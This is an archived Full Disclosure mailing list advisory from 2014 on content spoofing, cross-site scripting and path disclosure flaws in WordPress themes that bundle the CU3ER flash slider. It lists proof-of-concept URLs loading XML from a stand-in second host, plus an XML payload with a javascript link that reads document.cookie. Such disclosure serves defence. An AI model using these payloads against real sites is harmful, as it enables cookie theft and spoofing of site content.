Full Disclosure mailing list archives
CS, XSS and FPD vulnerabilities in multiple themes with CU3ER for WordPress
From: "MustLive" <mustlive () websecurity com ua>
Date: Fri, 25 Apr 2014 22:02:37 +0300
Hello list!Recently I disclosed vulnerabilities in CU3ER (http://seclists.org/fulldisclosure/2014/Apr/244) and vulnerabilities in plugins with CU3ER for WordPress, Joomla, SilverStripe and Plone (http://seclists.org/fulldisclosure/2014/Apr/251). This is popular flash file and in Google's index there are up to million web sites with it (inurl:cu3er.swf filetype:swf - now Google shows 994000 results).
These are Content Spoofing, Cross-Site Scripting and Full path disclosure vulnerabilities in themes with CU3ER for WordPress. CU3ER is used in the next plugins for WordPress: ShapeShifter, Los Angeles, Themebox, Elite Force, Webfolio and other themes, including custom themes. And premium themes like ShapeShifter, Themebox, Elite Force.
------------------------- Affected products: ------------------------- Vulnerable are all themes with flash file of CU3ER. Vulnerable are ShapeShifter 1.x і 2.x and previous versions. Vulnerable are Vulnerable are all versions of Los Angeles. Vulnerable are Themebox 1.1 and previous versions. Vulnerable are Elite Force 2.1.0 and previous versions. Vulnerable are Webfolio 2.0.2 and previous versions. ---------- Details: ---------- Content Spoofing (Content Injection) (WASC-12): ShapeShifter: http://site/wp-content/themes/shapeshifter/library/cu3er/cu3er.swf?xml=http://site2/1.xml http://site/wp-content/themes/shapeshifter2/library/cu3er/cu3er.swf?xml=http://site2/1.xml Los Angeles: http://site/wp-content/themes/los_angeles/assets/flash/cu3er.swf?xml=http://site2/1.xml Themebox: http://site/wp-content/themes/themebox/cu3er/cu3er.swf?xml=http://site2/1.xml Directory also can be named themebox10 and themebox11. Elite Force: http://site/wp-content/themes/elite_force/lib/includes/cu3er/cu3er.swf?xml=http://site2/1.xml http://site/wp-content/themes/elite_force/inc/cu3er/cu3er.swf?xml=http://site2/1.xml Webfolio: http://site/wp-content/themes/webfolio/cu3er/cu3er.swf?xml=http://site2/1.xml Cross-Site Scripting (WASC-08): ShapeShifter: http://site/wp-content/themes/shapeshifter/library/cu3er/cu3er.swf?xml=http://site2/xss.xml http://site/wp-content/themes/shapeshifter2/library/cu3er/cu3er.swf?xml=http://site2/xss.xml Los Angeles: http://site/wp-content/themes/los_angeles/assets/flash/cu3er.swf?xml=http://site2/xss.xml Themebox: http://site/wp-content/themes/themebox/cu3er/cu3er.swf?xml=http://site2/xss.xml Directory also can be named themebox10 and themebox11. Elite Force: http://site/wp-content/themes/elite_force/lib/includes/cu3er/cu3er.swf?xml=http://site2/xss.xml http://site/wp-content/themes/elite_force/inc/cu3er/cu3er.swf?xml=http://site2/xss.xml Webfolio: http://site/wp-content/themes/webfolio/cu3er/cu3er.swf?xml=http://site2 1.xml: <?xml version="1.0" encoding="UTF-8"?> <cu3er> <slides> <slide> <url>1.jpg</url> <link>http://websecurity.com.ua</link> </slide> </slides> </cu3er> xss.xml: <?xml version="1.0" encoding="UTF-8"?> <cu3er> <slides> <slide> <url>1.jpg</url> <link>javascript:alert(document.cookie)</link> </slide> </slides> </cu3er>For cross-domain attacks it's needed to have crossdomain.xml at web site with xml-files.
Full path disclosure (WASC-13):FPD in php-files of the theme (by default) or in error_log. In index.php and other php-files.
http://site/wp-content/themes/shapeshifter/ http://site/wp-content/themes/shapeshifter2/ http://site/wp-content/themes/los_angeles/ http://site/wp-content/themes/themebox/ http://site/wp-content/themes/themebox10/ http://site/wp-content/themes/themebox11/ http://site/wp-content/themes/elite_force/ http://site/wp-content/themes/webfolio/ ------------ Timeline:------------
2013.11.22 - announced at my site about CU3ER. 2013.11.26 - informed developer.2013.11.26 - announced at my site about plugins. Later informed developers of the plugins and themes.
2014.04.18 - disclosed at my site about plugins for different CMS.2014.04.22 - disclosed at my site about themes for WP (http://websecurity.com.ua/7125/).
Best wishes & regards, MustLive Administrator of Websecurity web sitehttp://websecurity.com.ua
_______________________________________________ Sent through the Full Disclosure mailing list http://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
Current thread:
- CS, XSS and FPD vulnerabilities in multiple themes with CU3ER for WordPress MustLive (Apr 25)